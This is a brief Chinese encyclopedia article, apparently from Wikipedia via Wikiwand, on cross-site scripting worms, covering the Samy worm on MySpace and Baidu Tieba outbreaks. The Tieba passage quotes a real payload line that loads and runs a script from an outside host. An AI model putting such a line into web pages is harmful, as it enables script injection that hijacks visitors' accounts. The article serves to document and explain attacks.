热门问题
时间线
聊天
视角
XSS蠕蟲
来自维基百科,自由的百科全书
Remove ads
xss蠕蟲(cross site scripting worm)是一種跨站病毒,通常由腳本語言Javascript寫成,它藉由網站訪問者傳播
![]() |
歷史
歷史第一個XSS蠕蟲是針對網站Myspace的Samy,它在20小時內感染了100萬個帳戶,作者Samy Kamkar之後被起訴
2013年5月19日, 百度貼吧轉帖功能再度出現xss漏洞,大量貼吧內充斥接近滿版面, 包含代碼getScript('//xss.retaker.me/1.js')為標題的帖子,當已登陸用戶打開這樣的帖子,用戶所持帳戶便以相同方式在多個貼吧轉帖原作者的帖,部分網絡安全相關人士認為貼吧爆發了大規模XSS蠕蟲感染[1] [2] [3]
2014年3月9日, 百度貼吧轉帖功能再度出現xss漏洞
性質
參考
Wikiwand - on
Seamless Wikipedia browsing. On steroids.
Remove ads